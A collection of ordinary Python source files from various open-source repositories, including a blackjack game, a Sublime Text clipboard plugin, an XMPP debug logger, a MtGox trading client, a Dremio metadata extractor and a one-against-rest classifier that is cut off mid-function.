def add_arguments(self, parser):
parser.add_argument(
'timeout',
nargs='?',
type=int,
)
def handle(self, timeout, **options):
if timeout is None:
result = get_running_workers()
else:
result = get_running_workers(timeout=timeout)
if not result:
print('(none)')
else:
for name in result:
print(name)
| 946 |
fpscanner/instructions/image/UpImage.py | nikialeksey/fingerprintscanner | 9 | 2171619 |
# MIT License
#
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PIL import Image
from ...communication import RqPackage
from ...communication import RsDataPacket
from ...communication import RsPackage
from ...communication.rqprimitives import RqByte
from ...instructions.InstructionException import InstructionException
class UpImage:
def __init__(self, rq, rs):
# type: (RqPackage, RsPackage) -> UpImage
self.rq = rq
self.rs = rs
def image(self):
# type: () -> Image
self.rq.send(RqByte(0x0A))
bytes = self.rs.bytes()
confirmation = bytes.content()[0]
if confirmation != 0:
raise InstructionException(
"Can not execute UpImage: {0}".format(confirmation)
)
result = Image.new('L', (256, 288), 'white')
pixels = result.load()
content = RsDataPacket(self.rs).content()
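        # Each response byte packs two 4-bit pixels; multiplying a nibble (0-15)
        # by 17 expands it to the full 0-255 grayscale range.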
y = 0
for line in content:
x = 0
for c in line:
pixels[x, y] = (c >> 4) * 17
x = x + 1
pixels[x, y] = (c & 0b00001111) * 17
x = x + 1
y += 1
return result
| 2,233 |
Packages/Default/paste_from_history.py | ron-wolf/sublime-files | 62 | 2172390 |
import re
import sublime
import sublime_plugin
class ClipboardHistory():
"""
Stores the current paste history
"""
LIST_LIMIT = 15
def __init__(self):
self.storage = []
def push_text(self, text):
if not text:
return
DISPLAY_LEN = 45
# create a display text out of the text
display_text = re.sub(r'[\n]', '', text)
# trim all starting space/tabs
display_text = re.sub(r'^[\t\s]+', '', display_text)
display_text = (display_text[:DISPLAY_LEN] + '...') if len(display_text) > DISPLAY_LEN else display_text
self.del_duplicate(text)
self.storage.insert(0, (display_text, text))
if len(self.storage) > self.LIST_LIMIT:
del self.storage[self.LIST_LIMIT:]
def get(self):
return self.storage
def del_duplicate(self, text):
# remove all dups
self.storage = [s for s in self.storage if s[1] != text]
def empty(self):
return len(self.storage) == 0
g_clipboard_history = ClipboardHistory()
class ClipboardHistoryUpdater(sublime_plugin.EventListener):
"""
Listens on the sublime text events and push the clipboard content into the
ClipboardHistory object
"""
def on_post_text_command(self, view, name, args):
if view.settings().get('is_widget'):
return
if name == 'copy' or name == 'cut':
g_clipboard_history.push_text(sublime.get_clipboard())
class PasteFromHistoryCommand(sublime_plugin.TextCommand):
def run(self, edit):
if self.view.settings().get('is_widget'):
return
# provide paste choices
paste_list = g_clipboard_history.get()
keys = [x[0] for x in paste_list]
self.view.show_popup_menu(keys, lambda choice_index: self.paste_choice(choice_index))
def is_enabled(self):
return not g_clipboard_history.empty()
def paste_choice(self, choice_index):
if choice_index == -1:
return
# use normal paste command
text = g_clipboard_history.get()[choice_index][1]
# rotate to top
g_clipboard_history.push_text(text)
sublime.set_clipboard(text)
self.view.run_command("paste")
| 2,264 |
library/xmpp/debug.py | l29ah/vk4xmpp | 77 | 2172536 |
## debug.py
##
## Copyright (C) 2003 <NAME>
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU Lesser General Public License as published
## by the Free Software Foundation; either version 2, or (at your option)
## any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
# $Id: debug.py, v1.41 2013/10/21 alkorgun Exp $
_version_ = "1.4.1"
import os
import sys
import time
from traceback import format_exception as traceback_format_exception
colors_enabled = "TERM" in os.environ
color_none = chr(27) + "[0m"
color_black = chr(27) + "[30m"
color_red = chr(27) + "[31m"
color_green = chr(27) + "[32m"
color_brown = chr(27) + "[33m"
color_blue = chr(27) + "[34m"
color_magenta = chr(27) + "[35m"
color_cyan = chr(27) + "[36m"
color_light_gray = chr(27) + "[37m"
color_dark_gray = chr(27) + "[30;1m"
color_bright_red = chr(27) + "[31;1m"
color_bright_green = chr(27) + "[32;1m"
color_yellow = chr(27) + "[33;1m"
color_bright_blue = chr(27) + "[34;1m"
color_purple = chr(27) + "[35;1m"
color_bright_cyan = chr(27) + "[36;1m"
color_white = chr(27) + "[37;1m"
class NoDebug:
def __init__(self, *args, **kwargs):
self.debug_flags = []
def show(self, *args, **kwargs):
pass
def Show(self, *args, **kwargs):
pass
def is_active(self, flag):
pass
colors = {}
def active_set(self, active_flags=None):
return 0
LINE_FEED = "\n"
class Debug:
def __init__(self, active_flags=None, log_file=sys.stderr, prefix="DEBUG: ", sufix="\n", time_stamp=0, flag_show=None, validate_flags=False, welcome=-1):
self.debug_flags = []
if welcome == -1:
if active_flags and len(active_flags):
welcome = 1
else:
welcome = 0
self._remove_dupe_flags()
if log_file:
if isinstance(log_file, str):
try:
self._fh = open(log_file, "w")
except Exception:
                    print("ERROR: cannot open %s for writing." % log_file)
sys.exit(0)
else: # assume its a stream type object
self._fh = log_file
else:
self._fh = sys.stdout
if time_stamp not in (0, 1, 2):
raise Exception("Invalid time_stamp param", str(time_stamp))
self.prefix = prefix
self.sufix = sufix
self.time_stamp = time_stamp
self.flag_show = None # must be initialised after possible welcome
self.validate_flags = validate_flags
self.active_set(active_flags)
if welcome:
self.show("")
caller = sys._getframe(1) # used to get name of caller
try:
mod_name = ":%s" % caller.f_locals["__name__"]
except Exception:
mod_name = ""
self.show("Debug created for %s%s" % (caller.f_code.co_filename, mod_name))
self.show(" flags defined: %s" % ",".join(self.active))
if isinstance(flag_show, (str, type(None))):
self.flag_show = flag_show
else:
raise Exception("Invalid type for flag_show!", str(flag_show))
def show(self, msg, flag=None, prefix=None, sufix=None, lf=0):
"""
        flag can be of the following types:
None - this msg will always be shown if any debugging is on
flag - will be shown if flag is active
(flag1,flag2,,,) - will be shown if any of the given flags are active
if prefix / sufix are not given, default ones from init will be used
        lf = -1 means strip linefeed if present
        lf = 1 means add linefeed if not present
"""
if self.validate_flags:
self._validate_flag(flag)
if not self.is_active(flag):
return None
if prefix:
pre = prefix
else:
pre = self.prefix
if sufix:
suf = sufix
else:
suf = self.sufix
if self.time_stamp == 2:
output = "%s%s " % (
pre,
time.strftime("%b %d %H:%M:%S",
time.localtime(time.time()))
)
elif self.time_stamp == 1:
output = "%s %s" % (
time.strftime("%b %d %H:%M:%S",
time.localtime(time.time())),
pre
)
else:
output = pre
if self.flag_show:
if flag:
output = "%s%s%s" % (output, flag, self.flag_show)
else:
# this call uses the global default, dont print "None", just show the separator
output = "%s %s" % (output, self.flag_show)
output = "%s%s%s" % (output, msg, suf)
if lf:
# strip/add lf if needed
last_char = output[-1]
if lf == 1 and last_char != LINE_FEED:
output = output + LINE_FEED
elif lf == -1 and last_char == LINE_FEED:
output = output[:-1]
try:
self._fh.write(output)
except Exception:
# unicode strikes again ;)
            s = ""
            for i in range(len(output)):
if ord(output[i]) < 128:
c = output[i]
else:
c = "?"
s += c
self._fh.write("%s%s%s" % (pre, s, suf))
self._fh.flush()
def is_active(self, flag):
"""
If given flag(s) should generate output.
"""
# try to abort early to quicken code
if not self.active:
return 0
if not flag or flag in self.active:
return 1
else:
# check for multi flag type:
if isinstance(flag, (list, tuple)):
for s in flag:
if s in self.active:
return 1
return 0
def active_set(self, active_flags=None):
"""
Returns 1 if any flags where actually set, otherwise 0.
"""
r = 0
ok_flags = []
if not active_flags:
# no debuging at all
self.active = []
elif isinstance(active_flags, (tuple, list)):
flags = self._as_one_list(active_flags)
for t in flags:
if t not in self.debug_flags:
sys.stderr.write("Invalid debugflag given: %s\n" % t)
ok_flags.append(t)
self.active = ok_flags
r = 1
else:
# assume comma string
try:
flags = active_flags.split(",")
except Exception:
self.show("***")
self.show("*** Invalid debug param given: %s" % active_flags)
self.show("*** please correct your param!")
self.show("*** due to this, full debuging is enabled")
self.active = self.debug_flags
for f in flags:
s = f.strip()
ok_flags.append(s)
self.active = ok_flags
self._remove_dupe_flags()
return r
def active_get(self):
"""
Returns currently active flags.
"""
return self.active
def _as_one_list(self, items):
"""
Init param might contain nested lists, typically from group flags.
        This code organises lst and removes dupes.
"""
if not isinstance(items, (list, tuple)):
return [items]
r = []
for l in items:
if isinstance(l, list):
lst2 = self._as_one_list(l)
for l2 in lst2:
self._append_unique_str(r, l2)
elif l == None:
continue
else:
self._append_unique_str(r, l)
return r
def _append_unique_str(self, lst, item):
"""
Filter out any dupes.
"""
if not isinstance(item, str):
raise Exception("Invalid item type (should be string)", str(item))
if item not in lst:
lst.append(item)
return lst
def _validate_flag(self, flags):
"""
Verify that flag is defined.
"""
if flags:
for flag in self._as_one_list(flags):
if not flag in self.debug_flags:
raise Exception("Invalid debugflag given", str(flag))
def _remove_dupe_flags(self):
"""
If multiple instances of Debug is used in same app,
some flags might be created multiple time, filter out dupes.
"""
unique_flags = []
for f in self.debug_flags:
if f not in unique_flags:
unique_flags.append(f)
self.debug_flags = unique_flags
colors = {}
def Show(self, flag, msg, prefix=""):
msg = msg.replace("\r", "\\r").replace("\n", "\\n").replace("><", ">\n <")
if not colors_enabled:
pass
elif prefix in self.colors:
msg = self.colors[prefix] + msg + color_none
else:
msg = color_none + msg
if not colors_enabled:
prefixcolor = ""
elif flag in self.colors:
prefixcolor = self.colors[flag]
else:
prefixcolor = color_none
if prefix == "error":
e = sys.exc_info()
if e[0]:
msg = msg + "\n" + "".join(traceback_format_exception(e[0], e[1], e[2])).rstrip()
prefix = self.prefix + prefixcolor + (flag + " " * 12)[:12] + " " + (prefix + " " * 6)[:6]
self.show(msg, flag, prefix)
def is_active(self, flag):
if not self.active:
return 0
if not flag or flag in self.active and DBG_ALWAYS not in self.active or flag not in self.active and DBG_ALWAYS in self.active:
return 1
return 0
DBG_ALWAYS = "always"
# Debug=NoDebug # Uncomment this to effectively disable all debugging and all debugging overhead.
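# Illustrative usage (a sketch; the flag name is arbitrary -- flags not registered
# in debug_flags are reported to stderr by active_set() but still honoured):
#     d = Debug(active_flags=["socket"], prefix="DEBUG: ")
#     d.show("connection established", flag="socket")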
| 8,671 |
browser_controller.py | crw2998/chartjs-python | 1 | 2173033 |
import contextlib
from time import sleep
import webbrowser
from pyppeteer import launch
# Simple implementation that is not up to the task of wrangling a whole browser
class SimpleBrowser(object):
def __init__(self):
pass
async def start_browser(self):
pass
async def open_page(self, url):
webbrowser.open(url)
async def set_figure_size(self, width, height):
pass
async def close(self):
return True
class PuppeteerBrowser(object):
def __init__(self, headless=False, use_scale_factor=True):
self._headless = headless
self._use_scale_factor = use_scale_factor
async def start_browser(self):
try:
self.browser = await launch(headless=self._headless, args=["--start-maximized"], setDefaultViewport=False)
self.page = await self.browser.newPage()
height, width, dpr = await self.page.evaluate("[screen.height, screen.width, window.devicePixelRatio]")
await self.page.setViewport({
"width": width-150,
"height": height-275,
"deviceScaleFactor": 2 if self._use_scale_factor else 1
});
except:
await self.try_close()
raise
async def open_page(self, url):
await self.page.goto(url)
async def set_figure_size(self, width, height):
await self.page.setViewport({
"width": width,
"height": height,
"deviceScaleFactor": 2 if self._use_scale_factor else 1
});
async def try_close(self):
with contextlib.suppress(Exception):
await self.browser.close()
async def take_screenshot(self, params):
canvas = await self.page.querySelector('canvas')
await canvas.screenshot(params)
| 1,642 |
concepticon/__init__.py | blurks/concepticon | 3 | 2173217 |
from pyramid.config import Configurator
from clld.interfaces import IDownload
# we must make sure custom models are known at database initialization!
from concepticon import models
from concepticon.views import search_concept
_ = lambda i: i
_('Contributor')
_('Contributors')
_('Contribution')
_('Contributions')
_('Parameter')
_('Parameters')
_('Value')
_('Values')
_('Unit')
_('Units')
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
config = Configurator(settings=settings)
config.include('clldmpg')
cldf = config.registry.queryUtility(IDownload, name='dataset.cldf')
assert config.registry.unregisterUtility(cldf, name='dataset.cldf')
config.add_route('search_concept', '/search_concept')
config.add_route('relations', '/relations')
return config.make_wsgi_app()
| 857 |
tests/conftest.py | anuragtr/fabric8-analytics-rudra | 3 | 2172803 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Add import context."""
from pathlib import Path
import sys
src = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(src))
| 182 |
source/Day11_Blackjack.py | jamescodella/100_days_of_code | 0 | 2172776 |
# Day 11: Blackjack Capstone Project
import random
import os
# List of cards provided in the course.
cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]
# Helper functions
def welcome():
    '''
    This function simply prints some ascii art and a welcome message.
    '''
ascii_art = '''
.------. _ _ _ _ _
|A_ _ |. | | | | | | (_) | |
|( \/ ).-----. | |__ | | __ _ ___| | ___ __ _ ___| | __
| \ /|K /\ | | '_ \| |/ _` |/ __| |/ / |/ _` |/ __| |/ /
| \/ | / \ | | |_) | | (_| | (__| <| | (_| | (__| <
`-----| \ / | |_.__/|_|\__,_|\___|_|\_\ |\__,_|\___|_|\_\\
| \/ K| _/ |
`------' |__/
'''
print('\n*** Welcome to Blackjack! ***')
print(ascii_art)
def calculate_score(hand):
'''
This function calculates the sum of values in a given hand.
'''
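    # For example, calculate_score([11, 11, 9]) returns 21: one ace is demoted to 1.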
score = 0
ace_indices = []
for idx, card in enumerate(hand):
score += card
if card == 11:
ace_indices.append(idx)
for idx in ace_indices:
if (score > 21):
score -= 10 # One ace is now treated as a 1.
return score
def draw_card():
'''
This function randomly selects a card from the cards dict
'''
return random.choice(cards)
def compare_scores(players_score, dealers_score):
'''
This function compares dealers score with the players score to see who won the game.
'''
if players_score > 21:
return 'You lose! Your hand went over 21 :('
if dealers_score > 21:
return 'You win! The dealer\'s hand went over 21 :)'
elif dealers_score < players_score:
return 'You win! :)'
elif dealers_score == players_score:
return 'It\'s a draw! :|'
else:
return 'You lose! :('
def game_summary(players_hand, players_score, dealers_hand, dealers_score):
'''
Summarizes final state and score of the game
'''
print('\n\nEND GAME SUMMARY')
print('-------------------------')
print(compare_scores(players_score, dealers_score))
print('Your final hand: ' + str(players_hand) + ', your final score: ' + str(players_score))
print('Dealer\'s final hand: ' + str(dealers_hand) +', dealer\'s final score: ' + str(dealers_score))
print('-------------------------\n')
def play_blackjack():
'''
Main function for game play
'''
# Print ascii art and welcome message
welcome()
# Initialize hands and vars
players_hand = []
dealers_hand = []
players_score = 0
dealers_score = 0
hit_or_stay = 'h'
blackjack = False
# Draw first two cards for each player
players_hand.append(draw_card())
players_hand.append(draw_card())
dealers_hand.append(draw_card())
dealers_hand.append(draw_card())
players_score = calculate_score(players_hand)
dealers_score = calculate_score(dealers_hand)
print('Your hand: ' + str(players_hand) + ', your score: ' + str(players_score))
print('Dealer\'s hand: ['+ str(dealers_hand[0]) +', _], dealer\'s score: ' + str(dealers_score))
if players_score == 21 or dealers_score == 21: # if blackjack occurs for either player, instant win and the game stops
print('\n***Blackjack!***')
hit_or_stay = 's'
blackjack = True
while (hit_or_stay == 'h' or hit_or_stay == 'hit') and blackjack is False:
hit_or_stay = input('Would you like to hit (h) or stay (s)? ').lower()
if hit_or_stay == 's' or hit_or_stay == 'stay':
print(players_hand, players_score)
break
players_hand.append(draw_card())
        players_score = calculate_score(players_hand)  # update the score before showing it
        print('Your hand: ' + str(players_hand) + ', your score: ' + str(players_score))
if players_score > 21: # Bust
break
if players_score <= 21 and blackjack is False:
while dealers_score < 17:
dealers_hand.append(draw_card())
dealers_score = calculate_score(dealers_hand)
game_summary(players_hand, players_score, dealers_hand, dealers_score)
keep_playing = input('Play again (y) or (n)? ')
if keep_playing == 'y' or keep_playing == 'yes':
        os.system('cls' if os.name == 'nt' else 'clear')  # os.name is 'nt' on Windows
play_blackjack()
else:
quit()
if __name__ == '__main__':
play_blackjack()
| 4,528 |
databuilder/extractor/dremio_metadata_extractor.py | mroztoczynski/amundsendatabuilder | 0 | 2171904 |
import sys
import logging
import pyodbc
import importlib
from pyhocon import ConfigFactory, ConfigTree
from typing import Iterator, Union, Dict, Any
from databuilder.extractor.base_extractor import Extractor
LOGGER = logging.getLogger(__name__)
class DremioMetadataExtractor(Extractor):
'''
Requirements:
pyodbc & Dremio driver
'''
DREMIO_USER_KEY = 'user_key'
DREMIO_PASSWORD_KEY = 'password_key'
DREMIO_HOST_KEY = 'host_key'
DREMIO_PORT_KEY = 'port_key'
DREMIO_DRIVER_KEY = 'driver_key'
MODEL_CLASS = 'model_class'
SQL_STATEMENT = 'sql_statement'
DEFAULT_AUTH_USER = 'dremio_auth_user'
DEFAULT_AUTH_PW = '<PASSWORD>'
DEFAULT_HOST = 'localhost'
DEFAULT_PORT = '31010'
DEFAULT_DRIVER = 'DSN=Dremio Connector'
DEFAULT_MODEL_CLASS = None
DEFAULT_SQL_STATEMENT = None
DEFAULT_CONFIG = ConfigFactory.from_dict({
DREMIO_USER_KEY: DEFAULT_AUTH_USER,
DREMIO_PASSWORD_KEY: DEFAULT_AUTH_PW,
DREMIO_HOST_KEY: DEFAULT_HOST,
DREMIO_PORT_KEY: DEFAULT_PORT,
DREMIO_DRIVER_KEY: DEFAULT_DRIVER,
MODEL_CLASS: DEFAULT_MODEL_CLASS,
SQL_STATEMENT: DEFAULT_SQL_STATEMENT
})
def init(self, conf: ConfigTree) -> None:
conf = conf.with_fallback(DremioMetadataExtractor.DEFAULT_CONFIG)
self.__sql_stmt = conf.get_string(DremioMetadataExtractor.SQL_STATEMENT)
self.__model_class = self.__get_model_class(conf.get(DremioMetadataExtractor.MODEL_CLASS, None))
driver = conf.get_string(DremioMetadataExtractor.DREMIO_DRIVER_KEY)
if sys.platform == 'linux':
driver = f'DRIVER={driver}'
self.__dremio_odbc_cursor = pyodbc.connect(
driver,
uid=conf.get_string(DremioMetadataExtractor.DREMIO_USER_KEY),
pwd=conf.get_string(DremioMetadataExtractor.DREMIO_PASSWORD_KEY),
host=conf.get_string(DremioMetadataExtractor.DREMIO_HOST_KEY),
port=conf.get_string(DremioMetadataExtractor.DREMIO_PORT_KEY),
autocommit=True).cursor()
self._extract_iter: Union[None, Iterator] = None
def extract(self) -> Any:
if not self._extract_iter:
self._extract_iter = self.__get_extract_iter()
try:
return next(self._extract_iter)
except StopIteration:
return None
def get_scope(self) -> str:
return 'extractor.dremio'
def __get_model_class(self, model_class_name):
if model_class_name:
module_name, class_name = model_class_name.rsplit(".", 1)
mod = importlib.import_module(module_name)
return getattr(mod, class_name)
def __get_extract_iter(self) -> Any:
LOGGER.info('SQL for Dremio metadata: {}'.format(self.__sql_stmt))
for record in self.__dremio_odbc_cursor.execute(self.__sql_stmt):
result = dict(zip([c[0] for c in self.__dremio_odbc_cursor.description], record))
yield self.__model_class(**result) if self.__model_class else result
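# Illustrative wiring (a sketch; the connection values and the SQL text are placeholders,
# not part of this module):
#     from pyhocon import ConfigFactory
#     extractor = DremioMetadataExtractor()
#     extractor.init(ConfigFactory.from_dict({
#         'user_key': 'dremio', 'password_key': 'secret',
#         'host_key': 'localhost', 'port_key': '31010',
#         'sql_statement': 'SELECT * FROM INFORMATION_SCHEMA."TABLES"',
#     }))
#     record = extractor.extract()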
| 3,161 |
FirstStepsInPython/Basics/Exams/exam_22_may_2021/05. Excursion Sale.py | Pittor052/SoftUni-Studies | 0 | 2172732 |
trips_sea = int ( input () )
trips_mountain = int ( input () )
command = input ()
sold = False
profit = 0
while not command == "Stop":
if command == "sea":
if not trips_sea == 0:
profit += 680
trips_sea -= 1
else:
trips_sea = 0
elif command == "mountain":
if not trips_mountain == 0:
profit += 499
trips_mountain -= 1
else:
trips_mountain = 0
if (trips_mountain == 0) and (trips_sea == 0):
sold = True
break
command = input()
if sold:
print("Good job! Everything is sold.")
print(f"Profit: {profit} leva.")
else:
print(f"Profit: {profit} leva.")
| 694 |
esi_bot/channels.py | lukasni/esi-bot | 4 | 2173020 |
"""ESI-bot channel helper class."""
import os
import time
from esi_bot.utils import paginated_id_to_names
class Channels:
"""Join and store channel IDs -> names."""
def __init__(self, slack):
"""Create a new Channels caching object."""
self._slack = slack
self._channels = {} # {id: name}
self._last_sync = 0
self._allowed = os.environ.get("BOT_CHANNELS", "esi").split(",")
self._joined = {} # {id: name}
self.primary = None # primary channel ID
self.update_names()
def update_names(self):
"""Update our names cache once per minute at max."""
if time.time() - self._last_sync < 60:
return
self._last_sync = time.time()
channels = paginated_id_to_names(
self._slack,
"channels.list",
"channels",
exclude_archived=1,
)
if channels:
self._channels = channels
def enter_channels(self):
"""Attempt to join the permitted channels.
Returns:
boolean of any channel successfully joined
"""
for ch_id, ch_name in self._channels.items():
if ch_name in self._allowed:
join = self._slack.api_call("channels.join", channel=ch_id)
if join["ok"]:
if self._allowed.index(ch_name) == 0:
self.primary = ch_id
self._joined[ch_id] = ch_name
else:
self._joined.pop(ch_id, None)
return self.primary is not None
def get_name(self, channel_id):
"""Return the channel name if we're in it."""
return self._joined.get(channel_id)
| 1,737 |
rltk/blocking/__init__.py | vishalbelsare/rltk | 98 | 2173245 |
from rltk.blocking.block import Block
from rltk.blocking.block_black_list import BlockBlackList
from rltk.blocking.block_generator import BlockGenerator
from rltk.blocking.hash_block_generator import HashBlockGenerator
from rltk.blocking.token_block_generator import TokenBlockGenerator
from rltk.blocking.canopy_block_generator import CanopyBlockGenerator
from rltk.blocking.sorted_neighbourhood_block_generator import SortedNeighbourhoodBlockGenerator
from rltk.blocking.blocking_helper import BlockingHelper
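# Shorter aliases for the block generator classes.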
Blocker = BlockGenerator
HashBlocker = HashBlockGenerator
TokenBlocker = TokenBlockGenerator
CanopyBlocker = CanopyBlockGenerator
SortedNeighbourhoodBlocker = SortedNeighbourhoodBlockGenerator
| 705 |
wordsDict.py | brupoon/mustachedNinja | 0 | 2172818 |
#Chapter 11, Exercise 1
#bpoon
def main():
words = open('words.txt')
wordDict = dict()
for i in words:
word = i.strip()
wordDict[word] = "yes"
def uInput():
uInput = input("word?")
if uInput in wordDict:
print("In dictionary.")
else:
print("Not in dictionary.")
uInput()
if __name__ == '__main__':
main()
| 388 |
src/private_markets/mtgox.py | omnibrain/bitcoin-arbitrage | 1 | 2172926 |
from market import Market
import time
import base64
import hmac
import urllib
import urllib2
import hashlib
import sys
import json
sys.path.append('../')
sys.path.append('.')
import config
import re
from decimal import Decimal
class PrivateMtGox(Market):
ticker_url = { "method": "GET", "url": "https://mtgox.com/api/1/BTCUSD/public/ticker" }
buy_url = { "method": "POST", "url": "https://mtgox.com/api/1/BTCUSD/private/order/add" }
sell_url = { "method": "POST", "url": "https://mtgox.com/api/1/BTCUSD/private/order/add" }
order_url = { "method": "POST", "url": "https://mtgox.com/api/1/generic/private/order/result" }
open_orders_url = { "method": "POST", "url": "https://mtgox.com/api/1/generic/private/orders" }
info_url = { "method": "POST", "url": "https://mtgox.com/api/1/generic/private/info" }
def __init__(self):
super(Market, self).__init__()
self.key = config.mtgox_key
self.secret = config.mtgox_secret
self.currency = "EUR"
self.get_info()
def _create_nonce(self):
return int(time.time() * 1000000)
def _change_currency_url(self, url, currency):
return re.sub(r'BTC\w{3}', r'BTC' + currency, url)
def _to_int_price(self, price, currency):
ret_price = None
if currency in ["USD", "EUR", "GBP", "PLN", "CAD", "AUD", "CHF", "CNY",
"NZD", "RUB", "DKK", "HKD", "SGD", "THB"]:
            ret_price = int(Decimal(price) * 100000)  # convert via Decimal to avoid float rounding
elif currency in ["JPY", "SEK"]:
            ret_price = int(Decimal(price) * 1000)
return ret_price
def _to_int_amount(self, amount):
amount = Decimal(amount)
return int(amount * 100000000)
def _from_int_amount(self, amount):
return Decimal(amount) / Decimal(100000000.)
def _from_int_price(self, amount):
# FIXME: should take JPY and SEK into account
return Decimal(amount) / Decimal(100000.)
def _send_request(self, url, params, extra_headers=None):
headers = {
'Rest-Key': self.key,
'Rest-Sign': base64.b64encode(str(hmac.new(base64.b64decode(self.secret),
urllib.urlencode(params), hashlib.sha512).digest())),
'Content-type': 'application/x-www-form-urlencoded',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
}
if extra_headers is not None:
for k, v in extra_headers.iteritems():
headers[k] = v
req = urllib2.Request(url['url'], urllib.urlencode(params), headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
jsonstr = response.read()
return json.loads(jsonstr)
return None
def trade(self, amount, currency, ttype, price=None):
if price:
price = self._to_int_price(price, currency)
amount = self._to_int_amount(amount)
self.buy_url["url"] = self._change_currency_url(self.buy_url["url"], currency)
params = [ ("nonce", self._create_nonce()),
("amount_int", str(amount)),
("type", ttype) ]
if price:
params.append(("price_int", str(price)))
response = self._send_request(self.buy_url, params)
if response and "result" in response and response["result"] == "success":
return response["return"]
return None
def buy(self, amount, currency, price=None):
return self.trade(amount, currency, "bid", price)
def sell(self, amount, currency, price=None):
return self.trade(amount, currency, "ask", price)
def get_info(self):
params = [ ("nonce", self._create_nonce()) ]
response = self._send_request(self.info_url, params)
if response and "result" in response and response["result"] == "success":
self.btc_balance = self._from_int_amount(int(response["return"]["Wallets"]["BTC"]["Balance"]["value_int"]))
self.eur_balance = self._from_int_price(int(response["return"]["Wallets"]["EUR"]["Balance"]["value_int"]))
return 1
return None
def __str__(self):
return str({ "btc_balance": self.btc_balance, "eur_balance": self.eur_balance })
if __name__ == "__main__":
mtgox = PrivateMtGox()
mtgox.get_info()
#mtgox.buy(0.01, "EUR")
#mtgox.sell(0.01, "EUR")
print mtgox
| 4,574 |
MotorTorpedoQuotePT109/QuotePT109/migrations/0003_auto_20220323_1626.py
|
alex-lake29/MotorTorpedoQuotePT-109
| 0 |
2173280
|
# Generated by Django 2.1.5 on 2022-03-23 16:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('QuotePT109', '0002_page_likes'),
]
operations = [
migrations.CreateModel(
name='QuoteImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.RenameField(
model_name='prompt',
old_name='prompt',
new_name='text',
),
]
| 589 |
Aula 18.py
|
camiloprado/Curso-Python
| 0 |
2173060
|
import pygame
pygame.init()
pygame.mixer.music.load('t.mp3')
n = input('Type "s" to start the music, "n" to stop it, or an empty line to quit: ')
# Keep handling commands until the user enters an empty line.
while n:
    if n == 's':
        pygame.mixer.music.play()
        pygame.event.wait()
        print('Enjoy!')
    elif n == 'n':
        pygame.mixer.music.stop()
        print('Music stopped!')
    else:
        print('Error!!!')
    n = input()
| 421 |
qiskit_aqua/multiclass/one_against_rest.py
|
NunoEdgarGFlowHub/aqua
| 1 |
2171700
|
# -*- coding: utf-8 -*-
# Copyright 2018 IBM.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from sklearn.preprocessing import LabelBinarizer
from sklearn import datasets
from sklearn.decomposition import PCA
from sklearn.cross_validation import train_test_split
from qiskit_aqua.multiclass.dimension_reduction import reduce_dim_to
import numpy as np
from sklearn.svm import LinearSVC
from sklearn.utils.validation import _num_samples
class OneAgainstRest: # binary: 1 and 0
def __init__(self, estimator_cls, params=None):
self.estimator_cls = estimator_cls
self.params = params
# def balance(self, X, Y, num_of_classes):
# cond = (Y==1)
# indcond = np.arange(Y.shape[0])[cond]
# X_filtered = X[indcond]
# Y_filtered = Y[indcond]
#
# for i in range(num_of_classes-2):
# Y = np.concatenate((Y,Y_filtered))
# X = np.concatenate((X,X_filtered))
#
# return X, Y
def train(self, X_train, y_train):
self.label_binarizer_ = LabelBinarizer(neg_label=-1)
Y = self.label_binarizer_.fit_transform(y_train)
# Y = Y.tocsc()
self.classes = self.label_binarizer_.classes_
num_of_classes = len(self.classes)
columns = (np.ravel(col) for col in Y.T)
self.estimators = []
for i, column in enumerate(columns):
# print(i, column) #X, column
unique_y = np.unique(column)
if len(unique_y) == 1:
raise Exception("given all data points are assigned to the same class, the prediction would be boring.")
if self.params == None:
estimator = self.estimator_cls()
else:
estimator = self.estimator_cls(*self.params)
# X_train_balanced, column_balanced = self.balance(X_train, column, num_of_classes)
# estimator.fit(X_train_balanced, column_balanced)
estimator.fit(X_train, column)
self.estimators.append(estimator)
def test(self, X, y):
A = self.predict(X)
B = y
l = len(A)
diff = 0
for i in range(0, l):
if A[i] != B[i]:
diff = diff + 1
print("%d out of %d are wrong" %(diff, l))
return 1-(diff*1.0/l)
def predict(self, X):
n_samples = _num_samples(X)
maxima = np.empty(n_samples, dtype=float)
maxima.fill(-np.inf)
argmaxima = np.zeros(n_samples, dtype=int)
for i, e in enumerate(self.estimators):
pred = np.ravel(e.decision_function(X))
